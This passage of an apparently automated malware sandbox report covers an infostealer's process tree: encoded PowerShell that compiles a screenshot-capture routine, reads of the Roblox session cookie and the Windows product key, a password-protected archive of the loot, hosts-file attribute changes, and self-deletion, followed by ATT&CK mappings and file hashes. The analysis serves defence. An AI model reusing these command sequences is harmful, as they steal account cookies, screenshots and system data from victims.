gAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4580
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hikqkjze\hikqkjze.cmdline"
        5⤵
        
        PID:4932
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp" "c:\Users\Admin\AppData\Local\Temp\hikqkjze\CSCE4B119D3B704330884AE27274F64E77.TMP"
        6⤵
        
        PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2152
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2840
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3192
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:632
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4448
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4400
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1208
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2856
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\REtC1.zip" *"
    3⤵
    PID:2104
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3356
  - - C:\Users\Admin\AppData\Local\Temp\_MEI11162\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI11162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\REtC1.zip" *
      4⤵
      Executes dropped EXE
      PID:1436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Sender.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3028
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0x7c,0x104,0x7ffd8e4acc40,0x7ffd8e4acc4c,0x7ffd8e4acc58
  2⤵
  PID:2408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2400,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2396 /prefetch:2
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1852,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:3
  2⤵
  PID:1568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1972,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2560 /prefetch:8
  2⤵
  PID:4724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:5096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:2516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4548 /prefetch:1
  2⤵
  PID:1876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4848,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8
  2⤵
  PID:1624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4932 /prefetch:8
  2⤵
  PID:2328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8
  2⤵
  PID:1436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5156 /prefetch:8
  2⤵
  PID:1716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5180,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4396 /prefetch:8
  2⤵
  PID:4200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5592,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5460 /prefetch:2
  2⤵
  PID:3844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5892,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:5100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4928,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5740,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5300 /prefetch:1
  2⤵
  PID:400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5400,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:2456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3804,i,11424222444680386291,10518418906028937877,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3380 /prefetch:8
  2⤵
  PID:4060

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4964

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x470 0x244
1⤵
PID:4492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
849a4c2a14c76b62943c93dcafa227e5

SHA1
38cb2314a6d76b1ed4e40a0aacc369b05633fa01

SHA256
179305dacd4ecb48143f59cb21635991c0475e31733f306909d9764ae1612b9c

SHA512
81381e0f514469b0154d1dc3f832ebb9f21a0fd5a18120635dd4f5774974ae3854e89ca790ebdb2e5ec72de38095845cb911229c5b489892cbb2de18d37ef590

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
d474ec7f8d58a66420b6daa0893a4874

SHA1
4314642571493ba983748556d0e76ec6704da211

SHA256
553a19b6f44f125d9594c02231e4217e9d74d92b7065dc996d92f1e53f6bcb69

SHA512
344062d1be40db095abb7392b047b16f33ea3043158690cf66a2fa554aa2db79c4aa68de1308f1eddf6b9140b9ac5de70aad960b4e8e8b91f105213c4aace348

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
8d730b0f97514957c9819b656b6058df

SHA1
b37103ba7af8680a4379f467ee1831476a9d0265

SHA256
e37eb5e273525395324add7db44deef9776f5d25120f98c5f14e1da09a474ef1

SHA512
a5d64361d7883645f0c2a19f434eff4305654f7382a75cedcdab753716e8e81541d8aa09e77340f1a792ce833e71f52b81e11f60d9e5e8b10e128408810b21f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
240B

MD5
0f1923ed93ce613145c8e2ea4e984907

SHA1
0cef61d70957db2f0058f6636368e52da2d50483

SHA256
bfe1a2227c542e7a77af373ca074010f30837a4f2281d1764b9a65ab5d4b0523

SHA512
9112dbbd0706eeddf2bc4f36d5a994c5f6ddc6c5f6ef94ccd0e19ec6a7585cae9684878d6a500a6909c8dc2f8e178589866be7442ee660fda750bb8fad348e05

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
e09bf011c1ec5afed4968b522f57857b

SHA1
eaf46d66e16a271e5eaed6328e47efa1dae8b769

SHA256
5ba354c7e05f8a2f23929725017708533172d0861f06cff96b3c0c817b609f52

SHA512
